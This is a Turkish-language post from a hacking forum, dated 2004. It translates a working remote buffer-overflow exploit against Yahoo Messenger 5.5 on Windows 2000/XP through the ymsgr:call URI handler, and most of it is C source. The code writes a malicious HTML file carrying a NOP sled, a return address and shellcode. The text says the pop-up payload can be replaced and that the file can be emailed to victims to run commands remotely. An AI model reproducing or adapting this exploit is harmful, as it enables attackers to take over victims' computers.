Root > Documents > Web Güvenlik Açıkları > Yahoo Exploit For Win XP
Cyber-Warrior.Org \ Doküman \ Web Güvenlik Açıkları > Yahoo Exploit For Win XP
Madde
  Yazar : Stroller
  Date : 23.11.2004 16:16:30
 
# Yahoo Exploit For Win XP
 
Win2k için Yahoo Messenger 5.5 Exploit

Çeviren : Cyber-Warrior Haberci Grubu (Stroller)

Yahoo Messenger neden bu açigi onarmadi
Bilmiyorum ama ne her iki durumda da aptallar

Bu exploit asagidaki programlarda test edilmistir:
* Yahoo Messenger 5,5,0,1246
* Yahoo Module 5,5,0,454

Windows 2000 Professional 5.0.2195 SP3 içindir.

Ravedtors.net bunun bir Windows versiyonun yayimlamistir.

Exploit Windows XP Pro SP1 içindir

Bu yüzden her iki hedef de XP/2k·ya açiktir. Bazi adreslerin degismesi gerekebilir.
Olusabilecek sorunlar:

Kullanilan adres kutudan kutuya degisiyor olabilir. Bu yüzden degismeleri gerekebilir.

Yigin iskelet kodu adresinin degismesini koruyor olabilir. Alternatifi olmayan, degismeyen bir sektöre ulasacaksiniz.
Iki çakisma var. Birisi bypass. Bu tasinamaz birime tecavüz etmekç Diger çakilma ise tasinmaz birimde oldugumuz aman. Bu yüzden ikincisini karistirmayin.

Burada kullanilan kabuk kod kötü niyetli degilidr. Sadece bir popup açar. Bu kodu degistirebilirsiniz. Ama tampon çok büyük degil. Bu yüzden birlesik kabuk imkani yok.

Bu exploit kurbanda uzaktan verilen komutu çalistirmaya yarar. Yalin olarak mantik URI yönetimidir. Ve kurban kötü html dosyasini görmelidir. Bu otomatik olarak e-posta yoluyla yapilabilir.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MessageBoxA "\x1d\x97\x53\x01"


char ret[8]= "\xD5\x96\x7A\x01";


unsigned char win32_msgbox[] = {
"\xEB\x19\x5E\x33\xC9\x89\x4E\x05\xB8" MessageBoxA "\x2D\x01\x01"
"\x01\x01\x8B\x18\x6A\x10\x56\x56\x51\xFF\xD3\xE8\xE2\xFF\xFF\xFF"
"\x62\x6f\x62\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
};


int main(int argc,char *argv[])
{
FILE *evil;
char *shellcode = win32_msgbox;
unsigned char buffer[5000];
int offset=320;


fprintf(stdout, "\n\tYahPoo.c By bob.\n");
fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5\n");
fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n\n");


fprintf(stdout,"Makin da EbUL HTML File... ");
if ((evil =fopen("yahoo.html","w"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Opened!\n");
}

memset(buffer,0x00,offset+32+strlen(shellcode));
memset(buffer,0x90,offset);


memcpy(buffer+offset,ret,4);
memcpy(buffer+offset+4,shellcode,strlen(shellcode));


buffer[264] = 0xD4; //address of &shellcode
buffer[265] = 0x96;
buffer[266] = 0x7A;
buffer[267] = 0x01;

buffer[272] = 0xF5; //jmp 0xc [msvcrt.dll]
buffer[273] = 0x01;
buffer[274] = 0x01;
buffer[275] = 0x78;


fprintf(evil,"<html>");
fprintf(evil,"<title>Bought to you by dtors.net!</title>\n");
fprintf(evil,"<B>Dtors Security Research (DSR)</B>\n");
fprintf(evil,"<p>Yahoo Messenger 5.5 exploit....</p>\n");
fprintf(evil,"<pre>");
fprintf(evil,"<a href=%cymsgr:call?%s%c>!EbUL Link!</a></bOdy></pre></html>\x00\x00\x00",0x22,buffer,0x22);
fclose(evil); // <-- closing yahoo.html

fprintf(stdout,"\nDa ebUL HTML file is >>yahoo.html<<\nEnjoy!\nwww.dtors.net\n\n");
}

   
   
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©